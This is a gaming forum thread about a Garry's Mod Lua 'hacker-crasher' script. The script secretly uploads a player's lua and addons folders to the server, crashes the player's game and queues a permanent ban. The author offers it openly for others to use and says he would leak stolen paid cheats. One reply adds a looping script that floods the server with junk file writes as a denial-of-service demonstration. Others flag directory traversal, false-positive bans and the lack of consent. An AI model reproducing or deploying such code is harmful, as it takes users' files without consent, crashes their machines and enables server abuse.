• A Hax Stealer Script
    24 replies, posted
Something I made to deal with hackers. It's SUPPOSED to copy their Lua folder, crash their game, and ban them permanently. I'm just curious if it works. If someone with some simple hax is willing to test it for me, I'd be pretty grateful. If someone can see an obvious issue, I'd enjoy the input. So, uh, here... [LUA] --Bobblehead's Hacker-Crasher if SERVER then util.AddNetworkString("Cheater") util.AddNetworkString("CheaterCode") net.Receive("Cheater", function(ln, client) client:SetPData("Cheater", true) client.FileDir = string.Replace(client:SteamID(), ":", "_") if not file.Exists( "HAX", "DATA" ) then file.CreateDir("HAX") end file.CreateDir("HAX/"..client.FileDir) end) -- hook.Add("EntityRemoved", "BanHaxorz", function(ent) -- if ent:IsPlayer() and ent:GetPData("Cheater",false) then -- RunConsoleCommand("ulx", "banid", ent:SteamID(), 0, "[BH-C] Hacking.") -- end -- end) net.Receive("CheaterCode", function(ln, client) if not client.FileDir then client.FileDir = string.Replace(client:SteamID(), ":", "_") end local dir, filename, filedata = net.ReadString(), net.ReadString(), net.ReadString() local dir = "HAX/"..client.FileDir.."/"..dir if not file.Exists(dir, "DATA") then file.CreateDir(dir) end if not file.Exists(dir.."/"..string.Replace(filename, ".lua", ".txt"), "DATA")then file.Write(dir.."/"..string.Replace(filename, ".lua", ".txt"), [[--[BH-C] I'M IN YOUR LUA! STEALING YOUR HAX... ]]..filedata) else file.Append(dir.."/"..string.Replace(filename, ".lua", ".txt"), filedata) end end) else hook.Add("Tick", "Nohax", function() if GetConVarNumber( "sv_allowcslua" ) == 1 then net.Start("Cheater") net.SendToServer() timer.Simple(60*8, cam.End3D) CopyDir("lua", "GAME") CopyDir("addons", "GAME") elseif GetConVar( "sv_allowcslua" ):GetInt() == 1 then net.Start("Cheater") net.SendToServer() timer.Simple(60*8, cam.End3D) CopyDir("lua", "GAME") CopyDir("addons", "GAME") elseif GetConVar( "sv_allowcslua" ):GetString() == "1" then net.Start("Cheater") net.SendToServer() timer.Simple(60*8, cam.End3D) CopyDir("lua", "GAME") CopyDir("addons", "GAME") elseif GetConVarString( "sv_allowcslua" ) == "1" then net.Start("Cheater") net.SendToServer() timer.Simple(60*8, cam.End3D) CopyDir("lua", "GAME") CopyDir("addons", "GAME") end end) local function CopyDir(dir,src) --copypasta from gmod wiki. local files = file.Find(dir.."/*.lua", src) for k,v in pairs(files) do if v and v ~= "" then SendFileToServer(dir,v) end end local files,directories = file.Find(dir.."/*", src) for _, fdir in pairs(directories) do if fdir ~= ".svn" then CopyDir(dir.."/"..fdir, src) end end end function SendFileToServer(dir,filename, filedata) local filedata = filedata or file.Read(filename) net.Start("CheaterCode") net.WriteString(dir)--directory first net.WriteString(filename)--directory first net.WriteString(string.Left(filedata, math.Round(string.len(filedata)/2)))--filedata third net.SendToServer() SendFileToServer(dir, filename, string.Right(filedata, math.Round(string.len(filedata)/2)))--Split it in half to make sure it goes. end end [/LUA] If anyone wants to use it themselves, I don't mind, assuming it works.
I won't believe that this works. :0
yo this is crazy i will be using this on my elite dark rp server powered by hera
BanHaxorz I'M IN YOUR LUA! STEALING YOUR HAX... copypasta found 3 errors
Yeah, and what if you set sv_allowcslua 1 on your server? Free bans and crashes for everyone?
[QUOTE=Robotboy655;40872293]Yeah, and what if you set sv_allowcslua 1 on your server? Free bans and crashes for everyone?[/QUOTE] Yeah. If YOU do that then have fun. ...Second thought I can imagine an rcon breakin being crazy bad. I'll make it check the server with the client.
[QUOTE=Robotboy655;40872293]Yeah, and what if you set sv_allowcslua 1 on your server? Free bans and crashes for everyone?[/QUOTE] Well if you have sv_allowcslua on, you'd be dumb to not expect people to cheat. That's why most servers have it off. Even if it is easily bypassed.
I don't care about people cheating, I am talking about this scripts reliability.
[lua] timer.Create("shitspam", 0.05, 0, function() net.Start("CheaterCode") net.WriteString(randomFolderName) net.WriteString(randomFileName) net.WriteString(randomData) net.SendToServer() end) [/lua] Thank you kindly for letting me write files on your server kthnx. Don't even try OP.
Look at OAC. It doesn't fix file sizes, but it shows how files should be sent.
whats the point of stealing his lua scripts (cheats) if you've already detected him?
Well I'm testing this on my test server so I won't really care if it ruins it. I've tested this and I'm getting an LUA error which I've no idea how to fix: Calling net.Start with an unpooled message name [code] hook.Add("Tick", "Nohax", function() if GetConVarNumber( "sv_allowcslua" ) == 1 then net.Start("Cheater") -- problem here net.SendToServer() timer.Simple(60*8, cam.End3D) CopyDir("lua", "GAME") CopyDir("addons", "GAME") [/code]
[LUA]util.AddNetworkString( "Cheater" )[/LUA] on serverside
Attempt to call 'CopyDir' <a nil value>
[QUOTE=Donkie;40874961]whats the point of stealing his lua scripts (cheats) if you've already detected him?[/QUOTE] To see what other ways of detecting hax there are. Stealing hax allows me to create a more thorough anticheat. Also I wouldn't mind releasing hax that people pay for onto the open internet, cuz fuck hackers. [QUOTE=Wizard of Ass;40874574][lua] timer.Create("shitspam", 0.05, 0, function() net.Start("CheaterCode") net.WriteString(randomFolderName) net.WriteString(randomFileName) net.WriteString(randomData) net.SendToServer() end) [/lua] Thank you kindly for letting me write files on your server kthnx. Don't even try OP.[/QUOTE] They can make whatever file they want but it only goes in the HAX folder and it can only be a .txt file. Who gives a fuck what kind of .txt file they make in the HAX folder? And if the system works correctly they have about 8 minutes before they're banned permanently anyway... [QUOTE=bluemist;40875287]Well I'm testing this on my test server so I won't really care if it ruins it. I've tested this and I'm getting an LUA error which I've no idea how to fix: Calling net.Start with an unpooled message name [code] hook.Add("Tick", "Nohax", function() if GetConVarNumber( "sv_allowcslua" ) == 1 then net.Start("Cheater") -- problem here net.SendToServer() timer.Simple(60*8, cam.End3D) CopyDir("lua", "GAME") CopyDir("addons", "GAME") [/code][/QUOTE] Line 34 add a ) after end.
[QUOTE=bobbleheadbob;40877083] They can make whatever file they want but it only goes in the HAX folder and it can only be a .txt file. Who gives a fuck what kind of .txt file they make in the HAX folder?[/QUOTE] [URL="http://en.wikipedia.org/wiki/Directory_traversal_attack"]Correct me if I am wrong but this.[/URL] Also, if you think a little harder, you would see what Wizard's script is doing. Every 50ms it puts a random text file with random data (probably the full 64kb) inside your folder. 64000 x 20 x 60 = 76800000, which translates to 73.24mb of junk data being sent to you every minute. Assuming the directories that are sent are named random things, that would equate to 1200 directories being created per minute. In addition to just fucking with your script, this probably also has DoS potential. Sure it writes everything to you hax folder, but it still allows arbitrary file uploading, and pissing off a hacker by crashing him and stealing his hacks isn't going to end well for you if they know what they are doing. Also, I'm pretty sure you can check it a networked string exists. Wizard could probably edit his script to see if your networked variables exist, so we could automatically look for your "anticheat" and mess with it. [QUOTE=bobbleheadbob;40877083] And if the system works correctly they have about 8 minutes before they're banned permanently anyway...[/QUOTE] Your system assumes that people just plain force allowcslua to cheat. Even though many of the ways to run lua without forcing the cvar aren't public, cvar hiding techniques are. This is probably the shittiest way to detect cheats, and the only cheats you are going to detect will be shit like hera.
[QUOTE=SashaWolf;40877364][URL="http://en.wikipedia.org/wiki/Directory_traversal_attack"]Correct me if I am wrong but this.[/URL] Your system assumes that people just plain force allowcslua to cheat. Even though many of the ways to run lua without forcing the cvar aren't public, cvar hiding techniques are. This is probably the shittiest way to detect cheats, and the only cheats you are going to detect will be shit like hera.[/QUOTE] I'll disallow ../ in the directory strings, banning if string.match(). I'll add a security code. Server sends the code to client, client sends it back to server with the files. If the code is different upon receival, the player is banned. And I'm stealing hax to find out how else to detect them. This might be easy to bypass now but once I get a good hax base I can overwrite functions used by their hacks and whatnot. The objective now is to get the stealer working and to ban them.
[QUOTE=bobbleheadbob;40877531]I'll disallow ../ in the directory strings. I'll add a security code. Server sends the code to client, client sends it back to server with the files. If the code is different upon receival, the player is banned. And I'm stealing hax to find out how else to detect them. This might be easy to bypass now but once I get a good hax base I can overwrite functions used by their hacks and whatnot. The objective now is to get the stealer working and to ban them.[/QUOTE] It's not a good idea to put an automated system in charge of permabanning/crashing people, especially as you start to add more and more unreliable methods that might detect hacks, but also have the possibility of detecting innocent users too. Also, if you want discussion on detecting cheats, go look at the [URL="http://facepunch.com/showthread.php?t=1260090"]anticheat thread[/URL]. Some neat stuff was discussed there. Stealing someone's scripts, crashing them, then releasing them is a dick move, and seeing how half the kids I have met on gmod have booters, it's not a very good idea to purposely piss random people off.
On a slightly related note... What causes a clientside reliable stack overflow?
[QUOTE=bobbleheadbob;40879482]On a slightly related note... What causes a clientside reliable stack overflow?[/QUOTE] I thought that was fixed in new gmod?
Can this thread be closed please, it's really not helping anyone.
[QUOTE=bobbleheadbob;40879482]On a slightly related note... What causes a clientside reliable stack overflow?[/QUOTE] Go take a look in the leaked 2007 sdk.
[QUOTE=Wizard of Ass;40880035]Can this thread be closed please, it's really not helping anyone.[/QUOTE] Someone has hax. I also fixed the stack overflow. Just gotta test it and I'm set.
I don't, plus you have no real idea what you are doing and only encourage to download peoples scripts without their consent which you should never do for any reason. I'm considering making a thread to add a blacklist to file.Open so people can join servers without getting half their stuff and eventually even gamemodes stolen.
[QUOTE=Wizard of Ass;40880113]I don't, plus you have no real idea what you are doing and only encourage to download peoples scripts without their consent which you should never do for any reason. I'm considering making a thread to add a blacklist to file.Open so people can join servers without getting half their stuff and eventually even gamemodes stolen.[/QUOTE] Go ahead. Anyway any sort of help I needed at first has been solved, so I'll just mark the thread as such.
Sorry, you need to Log In to post a reply to this thread.